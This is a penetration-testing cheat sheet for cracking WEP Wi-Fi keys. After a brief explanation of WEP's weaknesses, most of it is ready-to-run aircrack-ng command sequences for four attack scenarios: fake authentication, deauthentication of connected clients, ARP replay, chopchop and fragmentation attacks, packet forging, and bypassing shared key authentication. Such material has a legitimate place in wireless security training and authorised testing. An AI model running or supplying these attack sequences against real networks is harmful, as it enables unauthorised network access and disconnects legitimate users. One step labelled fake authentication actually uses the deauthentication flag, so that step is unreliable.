WEP
WEP Theory
WEP (Wired Equivalent Privacy) was designed around 1999 to offer security to wireless network users. This standard requires the access points and the authenticating users to know a common secret key of 5 characters (40 bits) or 13 characters (104 bits), although other variations exist (see below). WEP is known to be very weak (IVs can be reused, IVs are too short (24 bits), secret keys are too weak, ...). Note: when attacking 104 bits keys (13 chars), the only consequence is that the number of IVs needed for the cracking process is higher.
Encryption strength: 64-bit ( 40 + 24 bit IV) 128-bit (104 + 24 bit IV) 152-bit (128 + 24 bit IV) 256-bit (232 + 24 bit IV) 512-bit (488 + 24 bit IV)
WEP can be configured with two different authentication modes : Open and SKA (Shared Key Authentication). Despite what the name implies, SKA is not necessarily more "secure" than Open. In practice, having a shared key can mitigate the part where the attacker needs to obtain an associated state (whereby the AP accepts data sent from a client). However, given the implementation of the shared key it is easier to retrieve the WEP key due to the usage of a plaintext & encrypted challenge. However this requires obtaining the key stream from client to associate with AP - use deauthentication attack.
WEP Practical
WEP - AP with connected clients
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start <interface> <AP channel>
Start an Airodump-ng capture filtering on the AP channel and BSSID, saving the file to disk:
airodump-ng -c <AP Channel> --bssid <AP MAC> -w <capture> <interface>
Conduct a fake authentication attack against the AP:
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
Launch the ARP request replay attack:
aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>
Deauthenticate the connected client to force new IV generation by the AP:
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>
Once a significant number of IVs have been captured, run Aircrack-ng against the Airodump capture:
# DON'T use a dictionary for WEP files!!!!
aircrack-ng wep.cap
WEP - Via a Client
Place your wireless card into monitor mode on the AP channel:
airmon-ng start <interface> <AP channel>
Start a capture dump, filtering on the AP channel and BSSID, saving the capture to a file:
airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>
Next, conduct a fake authentication against the access point:
aireplay-ng -0 1 -e <ESSID> -a <AP MAC> -w <capture> <interface>
Launch the interactive packet replay attack looking for ARP packets coming from the AP:
aireplay-ng -2 -b <AP MAC> -d FF:FF:FF:FF:FF:FF -f 1 -m 68 -n 86 <interface>
Once enough IVs have been captured, crack the WEP key:
aircrack-ng -z <capture>
WEP - Clientless
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start <interface> <AP channel>
Conduct a fake authentication attack against the AP:
aireplay-ng -1 0 -e <ESSID> -a <AP MAC> -h <Your MAC> <interface>
Run attack 4, the KoreK chopchop attack (or attack 5, the fragmentation attack):
KoreK Chop Chop Attack
aireplay-ng -4 -b <AP MAC> -h <Your MAC> <interface>
Fragmentation Attack
aireplay-ng -5 -b <AP MAC> -h <Your MAC> <interface>
Craft an ARP request packet using packetforge-ng:
packetforge-ng -0 -a <AP MAC> -h <Your MAC> -l <Source IP> -k <Dest IP> -y <xor filename> -w <output filename>
Inject the packet into the network using attack 2, the interactive packet replay attack:
aireplay-ng -2 -r <packet filename> <interface>
Crack the WEP key using Aircrack-ng:
aircrack-ng <capture>
WEP - Bypassing Shared Key Authentication
Place your wireless card into monitor mode on the channel number of the AP:
airmon-ng start <interface> <AP channel>
Start an Airodump-ng capture, filtering on the AP channel and BSSID, saving the capture:
airodump-ng -c <AP channel> --bssid <AP MAC> -w <capture> <interface>
Deauthenticate the connected client to capture the PRGA XOR keystream:
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>
Conduct a fake shared key authentication using the XOR keystream:
aireplay-ng -1 0 -e <ESSID> -y <keystreamfile> -a <AP MAC> -h <Your MAC> <interface>
Launch the ARP request replay attack:
aireplay-ng -3 -b <AP MAC> -h <Your MAC> <interface>
Deauthenticate the victim client again to force the generation of an ARP packet:
aireplay-ng -0 1 -a <AP MAC> -c <Client MAC> <interface>
Once IVs are being generated by the AP, run Aircrack-ng against the capture:
aircrack-ng <capture>
Troubleshooting
During a Sharing Key Authentication Bypass attack, if once you deauthenticate a client you got a "Broken SKA" message instead of the "140 bytes keystream : " into your Airodump output. Try to restart the Airodump-ng capture and deauthenticate another client.